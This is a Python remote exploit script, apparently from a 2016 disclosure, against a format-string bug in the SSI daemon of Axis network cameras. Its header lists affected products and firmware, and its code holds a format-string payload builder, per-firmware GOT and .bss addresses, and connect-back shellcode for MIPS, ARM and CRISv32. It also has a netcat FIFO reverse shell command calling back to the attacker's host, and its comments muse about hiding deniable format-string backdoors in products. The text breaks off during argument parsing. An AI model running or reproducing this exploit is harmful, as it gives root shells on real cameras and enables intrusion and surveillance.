# 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid
# 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid
# 0001d000-00044000 rw-p 00000000 00:00 0 [heap]
#
# Crisv32 ssid maps
# 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid
# 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid
# 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap]
#
# General notes:
#
# When the vul daemon process is exploited, and after popping root connect-back shell,
# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process,
# when the main process are fully alive again, I can enjoy the shell, and everybody else can
# enjoy of the camera - that should make all of us happy ;)
# During exploiting, logs says almost nothing, only that the main process restarted.
# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits)
#
# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(),
# after ssid cannot verify the user, free() are the closest function to be called after
# vsyslog(), needed and perfect to use for jumping.
# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console.
# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics.
#
# Quite surprised to see so many different devices and under one major release version,
# that's covered by one "FMS key". The "FMS key" are valid for all minor versions under the major version.
#
# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor,
# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password.
#
# - No hardcoded login/password that could easily be found in firmware/software files.
# - Extremely hard to find without local access (and find out what to trigger for opening the door)
# - Nobody can not actually prove it is a sophisticated door for sure. "It's just another bug.. sorry! - here is the fixed version."
# (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find)
#
# Note:
# I don't say that Axis Communication has made this hidden format string by this purpose.
# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon,
# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr().
#
# Vulnerable and exploitable products
#
# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006,
# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364,
# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215,
# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384,
# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624,
# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E,
# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT,
# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045,
# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E,
# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203,
# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E,
# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E,
# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C,
# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W,
# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L,
# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more
#
# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
#
# Firmware versions vulnerable to the SSI FMS exploit
#
# ('V.Vx' == The FMS key used in this exploit)
#
# Firmware Introduced CRISv32 MIPS ARM (no exec heap from >5.20.x)
# 5.00.x 2008 - - no
# 5.01.x 2008 no - no
# 5.02.x 2008 no - -
# 5.05.x 2009 no - -
# 5.06.x 2009 no - -
# 5.07.x 2009 no - no
# 5.08.x 2010 no - -
# 5.09.x 2010 no - -
# 5.10.x 2009 no - -
# 5.11.x 2010 no - -
# 5.12.x 2010 no - -
# 5.15.x 2010 no - -
# 5.16.x 2010 no - -
# 5.20.x 2010-2011 5.2x - 5.2x
# 5.21.x 2011 5.2x - 5.2x
# 5.22.x 2011 5.2x - -
# 5.25.x 2011 5.2x - -
# 5.40.x 2011 5.4x 5.4x 5.4x
# 5.41.x 2012 5.4x - -
# 5.50.x 2013 5.5x 5.5x 5.4x
# 5.51.x 2013 - 5.4x -
# 5.55.x 2013 - 5.5x 5.5x
# 5.60.x 2014 - 5.6x 5.6x
# 5.65.x 2014-2015 - 5.6x -
# 5.70.x 2015 - 5.7x -
# 5.75.x 2015 - 5.7x 5.7x
# 5.80.x 2015 - 5.8x 5.8x
# 5.81.x 2015 - 5.8x -
# 5.85.x 2015 - 5.8x 5.8x
# 5.90.x 2015 - 5.9x -
# 5.95.x 2016 - 5.9x 5.8x
# 6.10.x 2016 - 6.1x -
# 6.15.x 2016 - - 6.1x
# 6.20.x 2016 - 6.2x -
#
# Vendor URL's of still supported and affected products
#
# http://www.axis.com/global/en/products/access-control
# http://www.axis.com/global/en/products/video-encoders
# http://www.axis.com/global/en/products/network-cameras
# http://www.axis.com/global/en/products/audio
#
# Axis Product Security
#
# product-security@axis.com
# http://www.axis.com/global/en/support/product-security
# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
# http://www.axis.com/global/en/support/faq/FAQ116268
#
# Timetable
#
# - Research and Development: 06/01/2016 - 01/06/2016
# - Sent vulnerability details to vendor: 05/06/2016
# - Vendor responce received: 06/06/2016
# - Vendor ACK of findings received: 07/06/2016
# - Vendor sent verification image: 13/06/2016
# - Confirmed that exploit do not work after vendors correction: 13/06/2016
# - Vendor informed about their service release(s): 29/06/2016
# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016
# - Full Disclosure: 18/07/2016
#
# Quote of the day: Never say "whoops! :o", always say "Ah, still interesting! :>"
#
# Have a nice day
# /bashis
#
#####################################################################################
import sys
import string
import socket
import time
import argparse
import urllib, urllib2, httplib
import base64
import ssl
import re
class do_FMS:
# POP = "%8x" # Old style POP's with 8 bytes per POP
POP = "%1c" # Old style POP's with 1 byte per POP
WRITElln = "%lln" # Write 8 bytes
WRITEn = "%n" # Write 4 bytes
WRITEhn = "%hn" # Write 2 bytes
WRITEhhn = "%hhn" # Write 1 byte
def __init__(self,targetIP,verbose):
self.targetIP = targetIP
self.verbose = verbose
self.fmscode = ""
# Mostly used internally in this function
def Add(self, data):
self.fmscode += data
# 'New Style' Double word (8 bytes)
def AddDirectParameterLLN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$lln')
# 'New Style' Word (4 bytes)
def AddDirectParameterN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$n')
# 'New Style' Half word (2 bytes)
def AddDirectParameterHN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$hn')
# 'New Style' One Byte (1 byte)
def AddDirectParameterHHN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$hhn')
# Addressing
def AddADDR(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('u')
# 'Old Style' POP
def AddPOP(self, size):
if size != 0:
self.Add(self.POP * size)
# Normally only one will be sent, multiple is good to quick-check for any FMS
#
# 'Old Style' Double word (8 bytes)
def AddWRITElln(self, size):
self.Add(self.WRITElln * size)
# 'Old Style' Word (4 bytes)
def AddWRITEn(self, size):
self.Add(self.WRITEn * size)
# 'Old Style' Half word (2 bytes)
def AddWRITEhn(self, size):
self.Add(self.WRITEhn * size)
# 'Old Style' One byte (1 byte)
def AddWRITEhhn(self, size):
self.Add(self.WRITEhhn * size)
# Return the whole FMS string
def FMSbuild(self):
return self.fmscode
class HTTPconnect:
def __init__(self, host, proto, verbose, creds, noexploit):
self.host = host
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.noexploit = noexploit
# Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\t','$','`' etc..
def RAW(self, uri):
# Connect-timeout in seconds
timeout = 5
socket.setdefaulttimeout(timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
tmp = self.host.split(':')
HOST = tmp[0]
PORT = int(tmp[1])
if self.verbose:
print "[Verbose] Sending to:", HOST
print "[Verbose] Port:", PORT
print "[Verbose] URI:",uri
s.connect((HOST, PORT))
s.send("GET %s HTTP/1.0\r\n\r\n" % uri)
html = (s.recv(4096)) # We really do not care whats coming back
# if html:
# print "[i] Received:",html
s.shutdown(3)
s.close()
return html
def Send(self, uri):
# The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually
# matter for the functionality of this exploit, only for future references.
headers = {
'User-Agent' : 'MSIE',
}
# Connect-timeout in seconds
timeout = 5
socket.setdefaulttimeout(timeout)
url = '%s://%s%s' % (self.proto, self.host, uri)
if self.verbose:
print "[Verbose] Sending:", url
if self.proto == 'https':
if hasattr(ssl, '_create_unverified_context'):
print "[i] Creating SSL Default Context"
ssl._create_default_https_context = ssl._create_unverified_context
if self.credentials:
Basic_Auth = self.credentials.split(':')
if self.verbose:
print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1]
try:
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
except Exception as e:
print "[!] Basic Auth Error:",e
sys.exit(1)
if self.noexploit and not self.verbose:
print "[<] 204 Not Sending!"
html = "Not sending any data"
else:
data = None
req = urllib2.Request(url, data, headers)
rsp = urllib2.urlopen(req)
if rsp:
print "[<] %s OK" % rsp.code
html = rsp.read()
return html
class shellcode_db:
def __init__(self,targetIP,verbose):
self.targetIP = targetIP
self.verbose = verbose
def sc(self,target):
self.target = target
# Connect back shellcode
#
# CRISv32: Written by myself, no shellcode availible out on "The Internet"
# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators
# MIPSel: Written by Jacob Holcomb (url encoded by me)
# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php
#
# Slightly modified syscall's
MIPSel = string.join([
#close stdin
"%ff%ff%04%28" #slti a0,zero,-1
"%a6%0f%02%24" #li v0,4006
"%4c%f7%f7%03" #syscall 0xdfdfd
#close stdout
"%11%11%04%28" #slti a0,zero,4369
"%a6%0f%02%24" #li v0,4006
"%4c%f7%f7%03" #syscall 0xdfdfd
#close stderr
"%fd%ff%0c%24" #li t4,-3
"%27%20%80%01" #nor a0,t4,zero
"%a6%0f%02%24" #li v0,4006
"%4c%f7%f7%03" #syscall 0xdfdfd
# socket AF_INET (2)
"%fd%ff%0c%24" #li t4,-3
"%27%20%80%01" #nor a0,t4,zero
"%27%28%80%01" #nor a1,t4,zero
"%ff%ff%06%28" #slti a2,zero,-1
"%57%10%02%24" #li v0,4183
"%4c%f7%f7%03" #syscall 0xdfdfd
#
"%ff%ff%44%30" # andi $a0, $v0, 0xFFFF
#
# dup2 stdout
"%c9%0f%02%24" #li v0,4041
"%4c%f7%f7%03" #syscall 0xdfdfd
#
# dup2 stderr
"%c9%0f%02%24" #li v0,4041
"%4c%f7%f7%03" #syscall 0xdfdfd
#
# Port
"PP1PP0%05%3c"
"%01%ff%a5%34"
#
"%01%01%a5%20" #addi a1,a1,257
"%f8%ff%a5%af" #sw a1,-8(sp)
#
# IP
"IP3IP4%05%3c"
"IP1IP2%a5%34"
#
"%fc%ff%a5%af" #sw a1,-4(sp)
"%f8%ff%a5%23" #addi a1,sp,-8
"%ef%ff%0c%24" #li t4,-17
"%27%30%80%01" #nor a2,t4,zero
"%4a%10%02%24" #li v0,4170
"%4c%f7%f7%03" #syscall 0xdfdfd
#
"%62%69%08%3c" #lui t0,0x6962
"%2f%2f%08%35" #ori t0,t0,0x2f2f
"%ec%ff%a8%af" #sw t0,-20(sp)
"%73%68%08%3c" #lui t0,0x6873
"%6e%2f%08%35" #ori t0,t0,0x2f6e
"%f0%ff%a8%af" #sw t0,-16(sp
"%ff%ff%07%28" #slti a3,zero,-1
"%f4%ff%a7%af" #sw a3,-12(sp)
"%fc%ff%a7%af" #sw a3,-4(sp
"%ec%ff%a4%23" #addi a0,sp,-20
"%ec%ff%a8%23" #addi t0,sp,-20
"%f8%ff%a8%af" #sw t0,-8(sp)
"%f8%ff%a5%23" #addi a1,sp,-8
"%ec%ff%bd%27" #addiu sp,sp,-20
"%ff%ff%06%28" #slti a2,zero,-1
"%ab%0f%02%24" #li v0,4011 (execve)
"%4c%f7%f7%03" #syscall 0xdfdfd
], '')
# Working netcat shell
# - $PATH will locate 'mkfifo', 'nc' and 'rm'
# - LHOST / LPORT will be changed on the fly later in the code
# - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting
# - $IFS = <space><tab><newline> [By default, and we need <space> or <tab> as separator]
# $ echo -n "$IFS" | hexdump -C
# 00000000 20 09 0a
# - $PS1 = $ [By default, and we need something to "comment" out our trailing FMS code from /bin/sh -c]
#
# '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator
#
# Working with Apache and Boa
# NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s\"$IFS\"2>/tmp/s;rm$IFS/tmp/s;$PS1"
NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s;rm$IFS/tmp/s;$PS1"
ARMel = string.join([
# original: http://shell-storm.org/shellcode/files/shellcode-754.php
# 32-bit instructions, enter thumb mode
"%01%10%8f%e2" # add r1, pc, #1
"%11%ff%2f%e1" # bx r1
# 16-bit thumb instructions follow
#
# socket(2, 1, 0)
"%02%20" #mov r0, #2
"%01%21" #mov r1, #1
"%92%1a" #sub r2, r2, r2
"%0f%02" #lsl r7, r1, #8
"%19%37" #add r7, r7, #25
"%01%df" #svc 1
#
# connect(r0, &addr, 16)
"%06%1c" #mov r6, r0
"%08%a1" #add r1, pc, #32
"%10%22" #mov r2, #16
"%02%37" #add r7, #2
"%01%df" #svc 1
#
# dup2(r0, 0/1/2)
"%3f%27" #mov r7, #63
"%02%21" #mov r1, #2
#
#lb:
"%30%1c" #mov r0, r6
"%01%df" #svc 1
"%01%39" #sub r1, #1
"%fb%d5" #bpl lb
#
# execve("/bin/sh", ["/bin/sh", 0], 0)
"%05%a0" #add r0, pc, #20
"%92%1a" #sub r2, r2, r2
"%05%b4" #push {r0, r2}
"%69%46" #mov r1, sp
"%0b%27" #mov r7, #11
"%01%df" #svc 1
#
"%c0%46" # .align 2 (NOP)
"%02%00" # .short 0x2 (struct sockaddr)
"PP1PP0" # .short 0x3412 (port: 0x1234)
"IP1IP2IP3IP4" #.byte 192,168,57,1 (ip: 192.168.57.1)
# .ascii "/bin/sh\0\0"
"%2f%62%69%6e" # /bin
"%2f%73%68%00%00" # /sh\x00\x00
"%00%00%00%00"
"%c0%46"
], '')
# Connect-back shell for Axis CRISv32
# Written by mcw noemail eu 2016
#
CRISv32 = string.join([
#close(0)
"%7a%86" # clear.d r10
"%5f%9c%06%00" # movu.w 0x6,r9
"%3d%e9" # break 13
#close(1)
"%41%a2" # moveq 1,r10
"%5f%9c%06%00" # movu.w 0x6,r9
"%3d%e9" # break 13
#close(2)
"%42%a2" # moveq 2,r10
"%5f%9c%06%00" # movu.w 0x6,r9
"%3d%e9" # break 13
#
"%10%e1" # addoq 16,sp,acr
"%42%92" # moveq 2,r9
"%df%9b" # move.w r9,[acr]
"%10%e1" # addoq 16,sp,acr
"%02%f2" # addq 2,acr
#PORT
"%5f%9ePP1PP0" # move.w 0xPP1PP0,r9 #
"%df%9b" # move.w r9,[acr]
"%10%e1" # addoq 16,sp,acr
"%6f%96" # move.d acr,r9
"%04%92" # addq 4,r9
#IP
"%6f%feIP1IP2IP3IP4" # move.d IP4IP3IP2IP1,acr
"%e9%fb" # move.d acr,[r9]
#
#socket()
"%42%a2" # moveq 2,r10
"%41%b2" # moveq 1,r11
"%7c%86" # clear.d r12
"%6e%96" # move.d $sp,$r9
"%e9%af" # move.d $r10,[$r9+]
"%e9%bf" # move.d $r11,[$r9+]
"%e9%cf" # move.d $r12,[$r9+]
"%41%a2" # moveq 1,$r10
"%6e%b6" # move.d $sp,$r11
"%5f%9c%66%00" # movu.w 0x66,$r9
"%3d%e9" # break 13
#
"%6a%96" # move.d $r10,$r9
"%0c%e1" # addoq 12,$sp,$acr
"%ef%9b" # move.d $r9,[$acr]
"%0c%e1" # addoq 12,$sp,$acr
"%6e%96" # move.d $sp,$r9
"%10%92" # addq 16,$r9
"%6f%aa" # move.d [$acr],$r10
"%69%b6" # move.d $r9,$r11
"%50%c2" # moveq 16,$r12
#
# connect()
"%6e%96" # move.d $sp,$r9
"%e9%af" # move.d $r10,[$r9+]
"%e9%bf" # move.d $r11,[$r9+]
"%e9%cf" # move.d $r12,[$r9+]
"%43%a2" # moveq 3,$r10
"%6e%b6" # move.d $sp,$r11
"%5f%9c%66%00" # movu.w 0x66,$r9
"%3d%e9" # break 13
# dup(0) already in socket
#dup(1)
"%6f%aa" # move.d [$acr],$r10
"%41%b2" # moveq 1,$r11
"%5f%9c%3f%00" # movu.w 0x3f,$r9
"%3d%e9" # break 13
#
#dup(2)
"%6f%aa" # move.d [$acr],$r10
"%42%b2" # moveq 2,$r11
"%5f%9c%3f%00" # movu.w 0x3f,$r9
"%3d%e9" # break 13
#
#execve("/bin/sh",NULL,NULL)
"%90%e2" # subq 16,$sp
"%6e%96" # move.d $sp,$r9
"%6e%a6" # move.d $sp,$10
"%6f%0e%2f%2f%62%69" # move.d 69622f2f,$r0
"%e9%0b" # move.d $r0,[$r9]
"%04%92" # addq 4,$r9
"%6f%0e%6e%2f%73%68" # move.d 68732f6e,$r0
"%e9%0b" # move.d $r0,[$r9]
"%04%92" # addq 4,$r9
"%79%8a" # clear.d [$r9]
"%04%92" # addq 4,$r9
"%79%8a" # clear.d [$r9]
"%04%92" # addq 4,$r9
"%e9%ab" # move.d $r10,[$r9]
"%04%92" # addq 4,$r9
"%79%8a" # clear.d [$r9]
"%10%e2" # addq 16,$sp
"%6e%f6" # move.d $sp,$acr
"%6e%96" # move.d $sp,$r9
"%6e%b6" # move.d $sp,$r11
"%7c%86" # clear.d $r12
"%4b%92" # moveq 11,$r9
"%3d%e9" # break 13
], '')
if self.target == 'MIPSel':
return MIPSel
elif self.target == 'ARMel':
return ARMel
elif self.target == 'CRISv32':
return CRISv32
elif self.target == 'NCSH1':
return NCSH
elif self.target == 'NCSH2':
return NCSH
else:
print "[!] Unknown shellcode! (%s)" % str(self.target)
sys.exit(1)
class FMSdb:
def __init__(self,targetIP,verbose):
self.targetIP = targetIP
self.verbose = verbose
def FMSkey(self,target):
self.target = target
target_db = {
#-----------------------------------------------------------------------
# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH)
#-----------------------------------------------------------------------
#
# Using POP format string, AKA 'Old Style'
#
# MPQT
'MIPS-5.85.x': [
0x41f370, # Adjust to GOT free() address
0x420900, # .bss shellcode address
2, # 1st POP's
2, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.40.3': [
0x41e41c, # Adjust to GOT free() address
0x4208cc, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'ax', # Aligns injected code
450, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.4x': [
0x41e4cc, # Adjust to GOT free() address
0x42097c, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'ax', # Aligns injected code
450, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.5x': [
0x41d11c, # Adjust to GOT free() address
0x41f728, # .bss shellcode address
5, # 1st POP's
15, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.55x': [
0x41d11c, # Adjust to GOT free() address
0x41f728, # .bss shellcode address
11, # 1st POP's
9, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# Shared with MPQT and PACS
'MIPS-5.6x': [
0x41d048, # Adjust to GOT free() address
0x41f728, # .bss shellcode address
5, # 1st POP's
15, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.7x': [
0x41d04c, # Adjust to GOT free() address
0x41f718, # .bss shellcode address
2, # 1st POP's
14, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.75x': [
0x41c498, # Adjust to GOT free() address
0x41daf0, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# Shared with MPQT and PACS
'MIPS-5.8x': [
0x41d0c0, # Adjust to GOT free() address
0x41e740, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.9x': [
0x41d0c0, # Adjust to GOT free() address
0x41e750, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-6.1x': [
0x41c480, # Adjust to GOT free() address
0x41dac0, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-6.2x': [
0x41e578, # Adjust to GOT free() address
0x41fae0, # .bss shellcode address
2, # 1st POP's
2, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-6.20x': [
0x41d0c4, # Adjust to GOT free() address
0x41e700, # .bss shellcode address
3, # 1st POP's
13, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# PACS
'MIPS-1.3x': [
0x41e4cc, # Adjust to GOT free() address
0x420a78, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# PACS
'MIPS-1.1x': [
0x41e268, # Adjust to GOT free() address
0x420818, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
#
# Tested with execstack to set executable stack flag bit on bin's and lib's
#
# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working.
#
# ARMel with bin/libs executable stack flag set with 'execstack'
# MPQT
'ARM-5.50x': [ #
0x1c1b4, # Adjust to GOT free() address
0x1e7c8, # .bss shellcode address
93, # 1st POP's
1, # 2nd POP's
'axis', # Aligns injected code
700, # How big buffer before shellcode
'ARMel' # Shellcode type (ARMel)
],
# ARMel with bin/libs executable stack flag set with 'execstack'
# MPQT
'ARM-5.55x': [ #
0x1c15c, # Adjust to GOT free() address
0x1e834, # .bss shellcode address
59, # 1st POP's
80, # 2nd POP's
'axis', # Aligns injected code
800, # How big buffer before shellcode
'ARMel' # Shellcode type (ARMel)
],
#
# Using direct parameter access format string, AKA 'New Style'
#
# MPQT
'ARM-NCSH-5.20x': [ # AXIS P1311 5.20 (id=root)
0x1c1b4, # Adjust to GOT free() address
0x10178, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
61, # 1st POP's
115, # 2nd POP's
143, # 3rd POP's
118, # 4th POP's
'NCSH2' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.2x': [ #
0x1c1b4, # Adjust to GOT free() address
0x1013c, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
61, # 1st POP's
115, # 2nd POP's
143, # 3rd POP's
118, # 4th POP's
'NCSH2' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.4x': [ #
0x1c1b4, # Adjust to GOT free() address
0x101fc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
61, # 1st POP's
115, # 2nd POP's
143, # 3rd POP's
118, # 4th POP's
'NCSH2' # Shellcode type (Netcat Shell)
],
#
# Using POP format string, AKA 'Old Style'
#
# MPQT
'ARM-NCSH-5.5x': [ #
0x1c15c, # Adjust to GOT free() address
0xfdcc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
97, # 1st POP's
0, # 2nd POP's
41, # 3rd POP's
0, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.6x': [ #
0x1c15c, # Adjust to GOT free() address
0xfcec, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
97, # 1st POP's
0, # 2nd POP's
41, # 3rd POP's
0, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.7x': [ #
0x1c1c0, # Adjust to GOT free() address
0xf800, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
132, # 1st POP's
0, # 2nd POP's
34, # 3rd POP's
0, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# Will go in endless loop after exit of nc shell... DoS sux
# MPQT
'ARM-NCSH-5.8x': [ #
0x1b39c, # Adjust to GOT free() address
0xf8c0, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
98, # 1st POP's
0, # 2nd POP's
34, # 3rd POP's
1, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-6.1x': [ #
0x1d2a4, # Adjust to GOT free() address
# 0xecc4, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
0xecc8, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
106, # 1st POP's
0, # 2nd POP's
34, # 3rd POP's
1, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
#
# Using POP format string, AKA 'Old Style'
#
# MPQT
'CRISv32-5.5x': [ #
0x8d148, # Adjust to GOT free() address
0x8f5a8, # .bss shellcode address
4, # 1st POP's
13, # 2nd POP's
'axis', # Aligns injected code
470, # How big buffer before shellcode
'CRISv32' # Shellcode type (Crisv32)
],
# MPQT
'CRISv32-5.4x': [ #
0x8d0e0, # Adjust to GOT free() address
0x8f542, # .bss shellcode address
4, # 1st POP's
13, # 2nd POP's
'axis', # Aligns injected code
470, # How big buffer before shellcode
'CRISv32' # Shellcode type (Crisv32)
],
# MPQT
'CRISv32-5.2x': [ #
0x8d0b4, # Adjust to GOT free() address
0x8f4d6, # .bss shellcode address
4, # 1st POP's
13, # 2nd POP's
'axis', # Aligns injected code
470, # How big buffer before shellcode
'CRISv32' # Shellcode type (Crisv32)
],
# MPQT
'CRISv32-5.20.0': [ #
0x8d0e4, # Adjust to GOT free() address
0x8f546, # .bss shellcode address
4, # 1st POP's
13, # 2nd POP's
'axis', # Aligns injected code
470, # How big buffer before shellcode
'CRISv32' # Shellcode type (Crisv32)
]
}
if self.target == 0:
return target_db
if not self.target in target_db:
print "[!] Unknown FMS key: %s!" % self.target
sys.exit(1)
if self.verbose:
print "[Verbose] Number of availible FMS keys:",len(target_db)
return target_db
#
# Validate correctness of HOST, IP and PORT
#
class Validate:
def __init__(self,verbose):
self.verbose = verbose
# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP
ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True
# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT
if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True
# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST
try:
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP
# Or we check again if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid DNS name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False
if __name__ == '__main__':
#
# Help, info and pre-defined values
#
INFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis <mcw noemail eu>]'
HTTP = "http"
HTTPS = "https"
proto = HTTP
verbose = False
noexploit = False
lhost = '192.168.0.1' # Default Local HOST
lport = '31337' # Default Local PORT
rhost = '192.168.0.90' # Default Remote HOST
rport = '80' # Default Remote PORT
# Not needed for the SSI exploit, here for possible future usage.
# creds = 'root:pass'
creds = False
#
# Try to parse all arguments
#
try:
arg_parser = argparse.ArgumentParser(
# prog=sys.argv[0],
